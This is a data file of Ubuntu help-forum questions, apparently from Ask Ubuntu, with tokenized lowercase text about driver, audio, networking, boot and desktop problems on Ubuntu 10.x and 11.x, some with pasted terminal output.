82270	how to improve the sound when using skype 2.2.0.35 on 10.10 ?	i have a macbookpro 5.3 equipped with ubuntu 10.10 on which i have repeatedly tried to use skype but the result is disappointing : ( a ) while i can hear and talk ( only when enabling pulseaudio ) , the quality of the sound is very very poor ; ( b ) each call to a phone number is duplicated ; ( c ) i have to manually kill skype to exit the program . in the past six months , i have tried various solutions found on the forums but with no satisfactory outcome .
82273	single instance of the gnome terminal ?	i 'd like to know or it is possible to set up the gnome terminal in a way that when i open up the terminal and there is already an instance open it 'll show that instance and not open up a brand new one .
82274	hp 530 wireless problem . bad communication with access point	i installed ubuntu 11.10 on hp 530 and to make wireless work installed sta driver from jockey ( obviously proprietary ) and , since it did n't work also installed their driver from hp website via ndiswrapper . after this ( and a reboot ) i see the wifi indicator glowing , like it should be , and i am able to find local access points . but when i try to connect to mine personal one with wpa 2 security ( with password ) it hangs at authentification ( i 'm using wicd to manage wifi ) , and after a minute or so ( i guess timeout of request happens ) it says i have a wrong password ( it is 100 % correct ) . what might be the problem here ? yesterday i was able to connect to access point by changing type of encryption from passphrase to preshared key but did n't have internet access . now , after reboot , i ca n't connect there again .
82275	window colors/shades/decoarations/whatever per instance	sometimes i open several instances of one program at the same time and have to switch between them every few seconds and get totally confused as to which is which ( they all display similar information , except few bits ) . i 'd like to have each one of them color-coded , different shades , window border , etc or have anything visual to make them differ from one another to ease the confusion . ideally this would happen automatically when i launch a new instance . i guess this belongs to the window manager so mine is xfce . in one of the window managers i used to use a huge label was displayed each time i switched between workspaces , something like that ( with window title or simple number ) would do as well . any clues ?
82280	how do i get ssh to listen on a new ip without restarting the machine ?	i have a few ubuntu server boxes set up on esx , and i changed the ip addresses via ssh . the moment i changed it , it dropped me off of ssh ( as expected ) . after a restart it works 100 % as expected and i can ssh in on the new ip . however , as much as this works and i know it is a solution , i am trying to learn linux and would like to restart/bind ssh to the new ip without restarting . i have attempted /etc/init.d/ssh restart ( and stop then start ) , and services ssh restart ( and stop then start ) , but , nothing seems to work . however , the weird thing is that from my other server ( running on the same esx box ) i can ssh in on the new ip , but , i just ca n't seem to ssh in from anywhere else until the box is restarted . i ca n't work out what i am doing wrong . has anyone seen this or can they offer any advice ? ( if it changes anything , the ips i was moving from/to are all internet/public directly routed ips )
82281	help with chainz galaxy	i just bought chainz galaxy from usc , but it does not work . i tried to contact mumbojumbo support , but they did n't help me at all ... thanks in advance here 's the output when i run it from the terminal willian @ willian-inspiron : ~ $ /opt/chainz/chainz ( hotbox:3256 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( hotbox:3256 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( hotbox:3256 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , ( hotbox:3256 ) : gtk-warning ** : unable to locate theme engine in module_path : `` pixmap '' , lua script executedpanic error in file `` /home/ubuntu/shared/hotsource_v5/hotengine/common/opengl/opengltexture.cpp '' , line 687 : failed to create opengl texture ( error code : 0x500 , size : 1024x768 - > 1024x1024 , format : 5 ) aborted willian @ willian-inspiron : ~ $ some useful information willian @ willian-inspiron : ~ $ uname -a linux willian-inspiron 3.0.0-13-generic-pae # 22-ubuntu smp wed nov 2 15:17:35 utc 2011 i686 i686 i386 gnu/linux willian @ willian-inspiron : ~ $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) willian @ willian-inspiron : ~ $ glxinfo | grep gl glx_arb_multisample , glx_ext_import_context , glx_ext_texture_from_pixmap , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_copy_sub_buffer , glx_oml_swap_method , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_intel_swap_event glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_ext_framebuffer_srgb , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event glx version : 1.4 glx extensions : glx_arb_get_proc_address , glx_arb_multisample , glx_ext_import_context , glx_ext_visual_info , glx_ext_visual_rating , glx_mesa_copy_sub_buffer , glx_mesa_multithread_makecurrent , glx_mesa_swap_control , glx_oml_swap_method , glx_oml_sync_control , glx_sgi_make_current_read , glx_sgi_swap_control , glx_sgi_video_sync , glx_sgis_multisample , glx_sgix_fbconfig , glx_sgix_pbuffer , glx_sgix_visual_select_group , glx_ext_texture_from_pixmap , glx_intel_swap_event opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ironlake mobile x86/mmx/sse2 opengl version string : 2.1 mesa 7.11 opengl shading language version string : 1.20 opengl extensions : gl_arb_multisample , gl_ext_abgr , gl_ext_bgra , gl_ext_blend_color , gl_ext_blend_logic_op , gl_ext_blend_minmax , gl_ext_blend_subtract , gl_ext_copy_texture , gl_ext_polygon_offset , gl_ext_subtexture , gl_ext_texture_object , gl_ext_vertex_array , gl_ext_compiled_vertex_array , gl_ext_texture , gl_ext_texture3d , gl_ibm_rasterpos_clip , gl_arb_point_parameters , gl_ext_draw_range_elements , gl_ext_packed_pixels , gl_ext_point_parameters , gl_ext_rescale_normal , gl_ext_separate_specular_color , gl_ext_texture_edge_clamp , gl_sgis_generate_mipmap , gl_sgis_texture_border_clamp , gl_sgis_texture_edge_clamp , gl_sgis_texture_lod , gl_arb_framebuffer_srgb , gl_arb_multitexture , gl_ext_framebuffer_srgb , gl_ibm_multimode_draw_arrays , gl_ibm_texture_mirrored_repeat , gl_3dfx_texture_compression_fxt1 , gl_arb_texture_cube_map , gl_arb_texture_env_add , gl_arb_transpose_matrix , gl_ext_blend_func_separate , gl_ext_fog_coord , gl_ext_multi_draw_arrays , gl_ext_secondary_color , gl_ext_texture_env_add , gl_ext_texture_filter_anisotropic , gl_ext_texture_lod_bias , gl_ingr_blend_func_separate , gl_nv_blend_square , gl_nv_light_max_exponent , gl_nv_texgen_reflection , gl_nv_texture_env_combine4 , gl_sun_multi_draw_arrays , gl_arb_texture_border_clamp , gl_arb_texture_compression , gl_ext_framebuffer_object , gl_ext_texture_env_dot3 , gl_mesa_window_pos , gl_nv_packed_depth_stencil , gl_nv_texture_rectangle , gl_nv_vertex_program , gl_arb_depth_texture , gl_arb_occlusion_query , gl_arb_shadow , gl_arb_texture_env_combine , gl_arb_texture_env_crossbar , gl_arb_texture_env_dot3 , gl_arb_texture_mirrored_repeat , gl_arb_window_pos , gl_ati_envmap_bumpmap , gl_ext_stencil_two_side , gl_ext_texture_cube_map , gl_nv_depth_clamp , gl_nv_vertex_program1_1 , gl_apple_client_storage , gl_apple_packed_pixels , gl_apple_vertex_array_object , gl_arb_draw_buffers , gl_arb_fragment_program , gl_arb_fragment_shader , gl_arb_shader_objects , gl_arb_vertex_program , gl_arb_vertex_shader , gl_ati_draw_buffers , gl_ati_texture_env_combine3 , gl_ext_shadow_funcs , gl_ext_stencil_wrap , gl_mesa_pack_invert , gl_mesa_ycbcr_texture , gl_arb_depth_clamp , gl_arb_fragment_program_shadow , gl_arb_half_float_pixel , gl_arb_point_sprite , gl_arb_shading_language_100 , gl_arb_sync , gl_arb_texture_non_power_of_two , gl_arb_vertex_buffer_object , gl_ati_blend_equation_separate , gl_ext_blend_equation_separate , gl_oes_read_format , gl_arb_color_buffer_float , gl_arb_pixel_buffer_object , gl_arb_texture_compression_rgtc , gl_arb_texture_rectangle , gl_ext_pixel_buffer_object , gl_ext_texture_compression_rgtc , gl_ext_texture_rectangle , gl_ext_texture_srgb , gl_arb_framebuffer_object , gl_ext_framebuffer_blit , gl_ext_framebuffer_multisample , gl_ext_packed_depth_stencil , gl_apple_object_purgeable , gl_arb_vertex_array_object , gl_ati_separate_stencil , gl_ext_draw_buffers2 , gl_ext_gpu_program_parameters , gl_ext_texture_env_combine , gl_ext_texture_srgb_decode , gl_ext_timer_query , gl_oes_egl_image , gl_arb_copy_buffer , gl_arb_half_float_vertex , gl_arb_map_buffer_range , gl_arb_texture_rg , gl_arb_texture_swizzle , gl_arb_vertex_array_bgra , gl_ext_separate_shader_objects , gl_ext_texture_swizzle , gl_ext_vertex_array_bgra , gl_nv_conditional_render , gl_arb_es2_compatibility , gl_arb_draw_elements_base_vertex , gl_arb_explicit_attrib_location , gl_arb_fragment_coord_conventions , gl_arb_provoking_vertex , gl_arb_sampler_objects , gl_arb_seamless_cube_map , gl_arb_shader_texture_lod , gl_ext_provoking_vertex , gl_ext_texture_snorm , gl_mesa_texture_signed_rgba , gl_arb_robustness 32 glx visuals 48 glxfbconfigs :
82283	failsafe mode only possible on gateway 3545	i am very new and unsure of how to ask my question properly . in short , i upgraded my daughter 's laptop - gateway 3545 - from 8.04 to 10.04 . now the video display only works in failsafe mode . how do i go about correcting this , i.e. , where do i start ? thanks in advance , and my apologies for not knowing what i 'm doing yet - learning ...
82286	thomson tg782t adsl2+ modem loses network connection	i am using an ubuntu 10.04 server ( running on a lenovo thinkpad notebook ) as my webserver . it is performing well in terms of handling the traffic etc . however my internet connection is adsl2+ ( using thomson tg782t modem-router ) and if the modem is reset , then my server loses network connection . the networkmanager icon shows a red exclamation mark showing that is has no connection . but as soon as i click on it and tell it to connect to eth0 , the connection is back on . it must be something that networkmanager is failing to do and because of this , the reliability of my webserver is suffering . any advice on how this can be fixed ?
82290	dual display setup - only one displayed after logon	during boot process my desktop shows both monitors , but after log i only get one . i 'm using ubuntu 11.10 when i go into displays its still only shows on monitor . here is my graphics card details : 01:00.0 vga compatible controller : nvidia corporation g72 [ geforce 7300 le ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) subsystem : dell device 0405 flags : bus master , fast devsel , latency 0 , irq 16 memory at dd000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at de000000 ( 64-bit , non-prefetchable ) [ size=16m ] [ virtual ] expansion rom at dfe00000 [ disabled ] [ size=128k ] capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_96 , nvidia_173 , nouveau , nvidiafb
82291	installing packages to end-of-lifed ubuntu editions ?	i currently have 8.10 on my machine which for some reasons i can not upgrade to latest version and i want to install some packages to it.but as you all must have guessed that i cant use apt-get install for anything.and i am fed up of satisfying the dependencies manually.so is there any alternate way of doing it ? can i download the server edition of it and get the .deb package from there.mysql is the package that i am looking for !
82295	error uninstalling postgresql : `sub-process /usr/bin/dpkg returned an error code ( 1 ) `	i am getting this error while executing sudo apt-get remove postgresql-8.4 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
82300	flashcard software for vocabularies ?	i am a chinese learning english . i am wondering is there some software that can help me to remember vocabularies ? i know there is software called supermemo which is commercial software . is there some alternatives ?
82302	how to compile ubuntu from source code ?	hello i wanted to know how can get ubuntu source code and compile it on my own . basically i wanted to give it a try so can some one help me regarding the steps to compile a full ubuntu system . also would this be beneficial as compared to installing from per-compiled binary ?
82304	can not select text whilst scrolling down the page in firefox	selection with scrolling in firefox on ubuntu 11.10 ( gnome-shell or unity ) : selection text when scrolling down the page is not feasible ( only up ) . in the chrome browser such bug is not available . this bug appears when firefox window is maximized ( as usualy ) . any ideas ?
82312	where have the 9.10 cd images gone ?	my installation scripts rely on downloading karmic , but they seem to have disappeared . they were there a couple of weeks ago i believe . any advice would be very welcome . sorry more info , using mint 8 that uses ubuntu9.10 , but the karmic repository appears to have vanished .
82313	games gish & polynominal , the `` a '' key is automatically in key-down state	for both gish and polynomial - space of the music , the `` a '' key seems to be being held down . this results in gish being completely unplayable as the leftward movement is unstoppable , so you ca n't do the first level , and polynomial being nausea-inducing as there is a constant leftward roll . this does not happen with any other game ( warsow , xonotic , dungeons of dredmor , oil rush , etc ) , just with these 2 , but it 's not specific to the game if it 's happening on 2 . does anybody know what could be going on ? for some background , i 'm using ubuntu 11.10 amd64 , with an nvidia geforce gt540m enabled using bumblebee ( due to optimus ) . edit : managed to find my own answer : it 's the gamepad inputs that seem to be doing strange things . if anybody gets the same problem , go into the controls and strip out all the gamepad/joystick inputs .
82318	dvdfab does not start after last update	since last update of dvdfab , i am unable to open the software . it seems to work fine on the first screen , in which i choose the option to use . once i click on it , the program does not load up and the `` wine '' icon in unity disappears , getting a blank desktop . i am using ubuntu 11.10 , last updated two days ago and the dvdfab version i 've got is 8.1.3.2 . has anybody had this problem ?
82322	how do i fix broken networking in cloned virtual machines ?	i 've set up a virtual machine configured with bridge networking . after making eight clones of it , the new machines ca n't connect to the network . i 've instructed virtualbox to re-generate the machines ' mac-addresses .
82326	dell studio 1558 shutting down due to over heating	my system ( dell studio 1558 ) gets shut down while using gnome shell on ubuntu 11.10 without any message , because the system over-heats . the fan below the processor is also not working . does any one know what to do ?
82327	compiz issues on intel integrated graphics chips	i 've upgraded to 11.10 from 11.04 on a toshiba satellite l305-s5907 and ca n't get compiz to work anymore . metacity runs in it 's place and `` compiz -- replace '' gives the following errors . checking if settings need to be migrated ... no checking if internal files need to be migrated ... no backend : gconf integration : true profile : unity adding plugins skipping upgrade com.canonical.unity.unity.01.upgrade skipping upgrade com.canonical.unity.unity.02.upgrade initializing core options ... done initializing bailer options ... done initializing detection options ... done initializing composite options ... done compiz ( opengl ) - fatal : root visual is not a gl visual compiz ( bailer ) - info : ensuring a shell for your session lspci -v gives 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) ( prog-if 00 [ vga controller ] ) subsystem : toshiba america info systems device ff67 flags : bus master , fast devsel , latency 0 , irq 45 memory at 90000000 ( 64-bit , non-prefetchable ) [ size=4m ] memory at 80000000 ( 64-bit , prefetchable ) [ size=256m ] i/o ports at 5110 [ size=8 ] expansion rom at < unassigned > [ disabled ] capabilities : < access denied > kernel driver in use : i915 kernel modules : i915 i have uninstalled all non-intel drivers and software packages ( ati , nvidia ) . mesa is installed . using the `` compiz-check '' script , i get : gathering information about your system ... distribution : ubuntu 11.10 desktop environment : gnome graphics chip : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) driver in use : unknown rendering method : none checking if it 's possible to run compiz on your system ... [ skip ] checking for hardware/setup problems ... [ skip ] at least one check had to be skipped : error : no rendering method in use ( aiglx , xgl or nvidia ) i have purged and re-installed compiz with no luck . i have deleted all of the ~/.config/compiz* folders with no result . nothing opengl works ( e.g glxgears , games , etc ) . tried compiz fusion but it does n't switch over to compiz . thanks in advance for the help .
82330	stuck with foreign-architecture=i386 when using apt-get	i installed some packages a while ago and for some reason , they would only install with a special set of parameters that i used as recommended on a website ( ca n't remember which one ) . now , although harmless , i am stuck with these warnings every time i run apt-get : dpkg : warning : ignoring option -- foreign-architecture=i386 : this architecture can not be foreign any idea where is this lying around ? how can i clean this up ?
82331	remote control direction keys repeat twice in mythtv	i have a gray hauppauge remote control that i have mostly working with mythtv ( mythbuntu 11.10 ) . the only remaining problem is that if i press the up , down , left , or right buttons on the remote , the selection in mythtv is moved two places in that direction . i 've tried playing around with the repeat and delay settings in the lircrc files but they have no effect . the irw command reports these button presses as single presses . any tips on how to debug this ? i got as much as i have working using the advice on this thread . here are all of my various lirc configuration files .
82335	acer 5750g-2334g75mnkk switchable graphics option in bios	ive recently bought this new laptop acer 5750g and im having issues using the nvidia card on ubuntu . system specs are : processor : intel速 core i3 2330m chipset : mobile intel速 hm65 express graphic card : nvidia geforce gt 520m ram : 4gb i was trying to install ubuntu 11.10 and installation hanged on a phase were it was checking [ sda ] attached scsi removable disk so i searched on the internet and i finally did a succesfull install by modifying bios graphic mode from switchable to integrated graphic . all in all , ubuntu 11.10 works perfectly fine if i select integrated on my bios but if i select switchable on the bios ubuntu just hangs on boot , i would like to use my nvidia card on ubuntu and atm im not finding any solution to my problem . also may be related my laptop integrates nvidia optimus technology . hope someone can help me . thanks
82336	where can i find the commands for the main menu items ?	how to find out full path ( with options ) to installed applications ( such as skype , firefox , chromium etc . ) in ubuntu 11.10 oneiric for adding them to autostart ?
82337	how do i get a canon mg , mp and mx series usb printer working ?	printer mp6150 driver installed itself upon plugging in the printer . printer is recognized ( lsusb shows it ) but does not mount . if the printer is recognized , the driver must be working ( or ? ) , but something is blocking the system from mounting the printer . tried the usual things : power of printer , restart ubuntu etc . listed below result of lsusb and fstab : hans @ kontor-linux : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 004 : id 04a9:174a canon , inc . bus 002 device 002 : id 1058:1001 western digital technologies , inc . external hard disk [ elements ] bus 004 device 002 : id 046d : c517 logitech , inc. lx710 cordless desktop laser hans @ kontor-linux : ~ $ sudo cat /etc/fstab [ sudo ] password for hans : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda6 during installation uuid=eaf3b38d-1c81-4de9-98d4-3834d674ff6e / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=93a667d3-6132-45b5-ad51-1f8a46c5b437 none swap sw 0 0 here is what i have tried : tried the hk link again , but no luck so far . however , i connected the printer wirelessly to router on other xp box . installing the driver from ppa : michael-gruz/canon does n't work , but the driver is installed
82341	huwawei e220 broadband dongle not working	the problem is , i have used ubuntu from 6.10 upto 11.10 . and upto 11.04 i used my same usb 3g dongle to connect to broadband and it worked fine . but 2 days ago i upgraded to ubuntu 11.10 and broadband is not working . it detects my dongle and creates a connection without a problem , but when connecting it just keeps on and on for a long time and then say i 'm offline . so i did a clean install and the same thing occurred . but i also have a netbook and its got ubuntu 11.10 . i tried using the same dongle for internet on that netbook and it worked fine without any issues . but this is n't a problem with my usb port on my main machine or something like that because i 'm also using windows on my main machine ( dual-boot ) and its working fine . my hardware : main computer ( one that i 'm trying to connect ) : 2.8ghz dual core intel 2gb ram 500gb sata ii hdd 384mb video memory ( intel g31/g33 chipset ) ubuntu 11.10 ( 32bit ) my netbook ( broadband working fine ) : 1.6ghz intel atom ( dual core ) 1gb ddr3 ram 250gb hdd 128mb video memory ( intel something-i-can't-remember ) ubuntu 11.10 ( 32bit ) my dongle is a huawei e220 and isp is dialog gsm ( i 'm in sri lanka ) so any idea why this is ? i really love ubuntu and this is bugging me off.. any help greatly appreciated . regards , roshnal
82344	how to convert a .pdf file into a folder of images ?	i have some .pdf files that i would like to convert to my preferred reading format of .cbr or .cbz or , if this is n't directly possible , i need to extract all pages from the .pdf as images and then compress them into my format of choice . i have only been able to save pages one at a time with document viewer . obviously , i 'd like to do it a little quicker . i have tried pdfsam , pdf shuffler , and pdfmod all with no luck . i am using ubuntu 11.10 .
82346	what is the mount point for an ftp server opened in nautilus ?	my question is what is the mount point in nautilus opening ftp server ( example : ctrl + l ftp : //ftpserver.com ) like dvd/cd was in /media/optical , or pendrive was on /media/mypendrive for example . i looked in /media /mnt and other folders but did not find
82347	how to hide firefox titlebar in gnome shell ?	i am running gnome-shell 3.2 in ubuntu 11.10 . is there a way to hide the firefox title bar and make it like chrome 's ? i would need the min/max buttons in tab-bar . there was a tutorial in webupd8 , but that was with compiz .
82355	how do i install adium themes in pidgin ?	any chance to install adium themes in pidgin on ubuntu 11.10 ? i try tutorials for 9.10 and 10.10 but unsuccessful . update 25 nov 2011 i think this question can not be considered duplicate , since it refers to the version 11.10 . how to install on ubuntu 11.10 ( based on karmic installation with some changes ) : sudo add-apt-repository ppa : webkit-team/ppa sudo apt-get update sudo apt-get install -y -- force-yes pidgin-dev libpurple-dev libwebkit-dev bzr checkinstall bzr branch lp : ~pdffs/pidgin-webkit/karmic-fixes cd karmic-fixes/ make sudo checkinstall -- fstrans=no -- install=yes -- pkgname=pidgin-adium -- pkgversion `` 0.1 '' -- default cd .. sudo rm -r karmic-fixes/ sudo chown -r $ user $ home/.purple/ that 's it !
82356	program installer not detecting internet	hello i am trying to install a program through the ubuntu software center . every time i click install i get a message stating `` failed to download package files , check your internet connection '' . i have tried different software installs and get the same message . i do have an internet connection ( hence being able to write this ) , i have restarted the computer and have reset the internet ( twice ) but still get the same message . any ideas ? ?
82363	thinkpad t420s docking station : no sound on external speakers	when i plug external speakers into the docking station for thinkpad t420s i get no sound ( internal speakers mute ) . p.s . i know the solution but it seems to be ok post problem specific solution in form of question and answer .
82364	grub drops to rescue shell - fix mbr and windows bootloader	i shall just give a bit of background information . i updated a broken ubuntu installation to oneiric from the live cd a while ago , and everything appeared to be working fine . because i do n't use the affected pc ( it 's mainly for my family ) , i booted it back into windows after trying out 11.10 . however , during the upgrade , i checked the `` install bootloader '' option for some reason , even though grub was already installed . before the upgrade , i had configured the system startup to load the windows bootloader first , which would display the options `` microsoft windows '' and `` ubuntu '' . choosing `` ubuntu '' would obviously load grub , which would show all of the installed linux distributions as well as an option to reload the windows loader , located at the bottom of the list . however , after i upgraded , grub was default due to the reinstall . this was n't a major problem , as i could always set the windows bl as default , or just set grub to highlight the windows loader option by default . anyway , to the real issue : at boot , the system drops to a grub rescue tty , giving the error `` unknown filesystem '' . because i saw a shell that i 'm not really familiar with , i typed some common unix commands to see what kind of environment i was in . my first command was ls , and it worked ; it showed a list of filesystems . it output : ( hd0 ) ( hd0 , msdos3 ) ( hd0 , msdos2 ) ( hd0 , msdos1 ) . i 'm not sure what to do from here . i 'm assuming i should boot into a live environment and do some common disk operations . should i run fsck ? if all is well or repairs succeed , should i update the grub configuration ? how so ? if all is not well , what then ? thanks in advance .
82365	how to uninstall/reinstall raderon 7500 driver ?	how i can uninstall or reinstall my radeon 7500 driver ? also , can i try a different xorg version ? my t40 ( thinkpad ) is not getting 3d acceleration on ubuntu 11.10 . what is the best ubuntu version if i want to enable effects in compiz ( like wobbling windows ) ? i am not an advanced linux user , but i have used fedora , so i have a bit of experience . i no longer use windows , unless i am using fruityloops .
82366	custom xsession with gnome visuals	i 'm trying to create a kiosk pc only for web browsing using this tutorial as a reference ( only difference - i 'm using firefox instead of chromium ) it is working correctly in principle ( only ff window opens when i log in using the kiosk session ) but it looks , well , super ugly . the scrollbar and right-click context menus look like from the 1990s - gray and boxy . how could i modify the session to get gnome-like scrollbars/menus without the whole gnome desktop ( top/bottom panel etc ) ? my custom x session is currently set up like this : /usr/share/xsessions/kiosk.desktop : [ desktop entry ] encoding=utf-8 name=kiosk mode comment=firefox kiosk mode exec=/usr/share/xsessions/ffkiosk.sh type=application /usr/share/xsessions/ffkiosk.sh : # ! /bin/bash while true ; do firefox -height 768 -width 1024 ; sleep 1s ; done
82367	can i test ubuntu cloud in virtualbox ?	i was wondering if there was any way to install ubuntu cloud ( nodes and clusters ) inside virtualbox just to see how things work , before i actually use multiple machines to do the job ? i know if it is possible the system will be very slow , but its just a one time trial to see how things work if i setup my own cloud . thanks
82368	after upgrade my webcam mic records fast , high pitched , and squeaky only in skype ( maybe sound recorder problem too )	after an upgrade to 11.10 ( kernel : linux lucid 3.0.0-13-generic # 22-ubuntu ) which probably also updated skype to 2.2.35 ( not sure because i never checked the version before ) the sound that comes back from an echo test is very high pitched and squeaky . i 'm not sure if when in a call if the other person ca n't hear or just does n't know what they are hearing . i am using a usb logitech c250 audacity records fine , gmail video chat works fine , but if i start sound recorder i get a `` could not negotiate format '' , followed by `` could not get/set settings from/on resource '' . i do n't know if this is a skype problem or a wider pulse problem . my only real needs are the gmail and audacity , though i have a couple of contacts that i can only skype with .
82369	sources not authenticating properly error on update	i have just installed ubuntu 11.10 on the latest virtualbox . all went as expected . i then tried to apply the 260 odd updates it needed , as per usual . what i then get is a message about the sources not authenticating properly . how do i fix this ?
82371	is there any way to send and receive sms through my prolink phs300 3g modem ?	is there any way to send and receive sms through my 3g modem . i 'm using prolink phs300 modem .
82372	how do i get an xstream mobile phone working as a modem ?	i bought a cdma mobile phone that can use as modem , this http : //smartfren.com/xstream/ and i wan na try it on my ubuntu plug usb , and run `` lsusb '' callmegus @ presario-cq43-304au : ~ $ lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 058f : a001 alcor micro corp . bus 003 device 002 : id 1bbb:0106 t & a mobile phones bus 003 device 003 : id 15d9:0a4c trust international b.v. usb+ps/2 optical mouse bus 004 device 002 : id 0a5c:21e3 broadcom corp . i successfully `` modprobe '' this device , and connect to internet , but it 's disconnected somehow .. and i can recconect it . i try `` lsusb '' again .. and something went wrong , here bus 003 device 002 : id 1bbb:1000 t & a mobile phones i do `` modprobe '' again and again , but it still wo n't connect please guide me
82374	how do i start/stop mysql server ?	i try find in internet some article where describe how correct start -stop mysql server . i find this article : how to start/stop mysql server on ubuntu 8.04 | abhi 's blogging world i run this command : /etc/init.d/mysql start but i see this error error 1045 ( 28000 ) access denied for user ... . after i try this command : sudo /etc/init.d/mysql start enter pass and again i see the same error . next command : sudo /etc/init.d/mysql - root -p start in result : error 1049 ( 42000 ) unknown database 'start ' . and only i run this command : sudo service mysql start mysql server success started . cool ! so , what wrong with other command ? why in result error ?
82380	how to install custom application in gnome shell ?	i downloaded thunderbird 8 in .tar.bz2 format and copied the directory to /opt . i want to create a shortcut for it in the applications section in gnome shell how do i do that ?
82385	running pulseaudio	how can i manage to make pulseaudio run under ubuntu 11.10 ? from the dash i search for pulseaudio , when i find it , i click on the icon and get the following reply : fatal error : unable to connect to pulseaudio
82389	mouse pointer moves too fast	the mouse settings are already set to `` accellaration '' - `` slow '' and `` sensitivity '' `` low '' and the mouse pointer moves fast . any fixes for this . i 'm using a gigabyte bluetooth mouse , unity 11.10 .
82392	screen does n't turn back on after resume on a lenovo thinkpad t420	every time i suspend my notebook ( lenovo thinkpad t420 - intel hd graphic card ) on oneiric ocelot 11.10 and turn it back on , the screen is black . the backlight is on and the system itself loads fine , but the display somehow does n't get back . the first time after a fresh reboot the screen is n't black , it is mostly white/light-gray and it looks a bit like a distorted image . the pixels fade in until it gets almost completely light-gray . i 've got a workaround for this : i switch to the first terminal ( ctrl+alt+f1 ) and back to x ( ctrl+alt+f7 ) . in most cases that helps . sometimes , when there 's still a problem , i log in on the first terminal and run `` unity -- reset '' . then go back to x - this helps always . i can tell that the system comes back , because i can log in with my fingerprint reader ( or wait a bit and put in the password ) `` blindly '' , then do the workaround - i am logged in after the screen comes back . so it 's only the display that is not working . any help or advice where to look would be appreciated .
82395	how can i change the size of unity 2d launcher icons ?	is it possible to make unity 2d launcher icons smaller or larger than the default size ?
82397	run script as root at login ( no sudoer user , shell session )	much like /etc/profile and ~/.profile but ran by root instead of the user is doing login . /etc/rc.local runs after boot but i need running the script before login . the user is not a sudoer one . thanks !
82398	how to zoom in & zoom out	while using 10.04 and the previous versions i used to put ctrl+f6 to zoom in and subsequently ctrl+f7 to zoom out . now i ca n't even find the options to zoom in and zoom out in the `` keyboard shortcuts '' . i tried `` the magnifier '' in the compiz but really ca n't understand what is going on right there . there is simple question i would like to ask : what to do so as to be able to zoom in with ctrl+f6 and zoom out with ctrl+f7 ? thanks a lot .
82402	how can i unbreak compiz so that unity will start ?	i have been playing around with compiz settings , and i apparently did something that is making compiz ( and therefore unity ) not start when i log in . is there a compiz settings directory somewhere i can delete to restore default settings and get unity back ?
82406	aws ubuntu instance - user rights	i am running an instance of ubuntu on amazon web services , all working pretty dandy . i 've got one little snag that i 'm trying to find the answer to atm . amazon forces you to have another user other than root . and thus you can not connect as root . so in i go with my username via ssh and sftp , works v well . however , i can not edit anything unless explicitly giving the file chmod 777 rights . now i am quite clear as to what the problem is , just not the solution . my user second user , logs into his/her home directory just fine . but my apache install and files are located at /var/www could i solve this by symlinks in the home directory etc or is there a way i can setup the permissions for this user to access and write to the /var/www folder and all files within it , without also giving that right to the general public ? any help would be much appreciated .
82410	web browsing vs. torrent traffic , and bandwidth priority ?	recently i did download big torrent files . ( 120 gb ) . and i need to seed them back to at least 1.5 ratio . my upload speed is 130 kb/s max . the problem is that i need to seed them as fast as possible . but i browse the web a lot . and browsing with no upload left , can be very frustrating . i 'm looking for something like this , torrent are on max . seeding rate , but when the browser needs the bandwidth , it gets it . priority is to web browser , but when not needed , torrent can be at max . i 'm aware that i can change torrent client max speed . but doing it manually everytime and every 5 minutes or so , is hard . info : i 'm using firefox/chrome my torrent client is ktorrent i 'm on 11.10 with unity i do have a router , it 's a hag . and i ca n't access all it 's properties . is this possible even ? changing the priority in the system monitor for the applications can do the job ? the nice value i mean . is there a way to set priority bandwidth usage for different apps ? thank you !
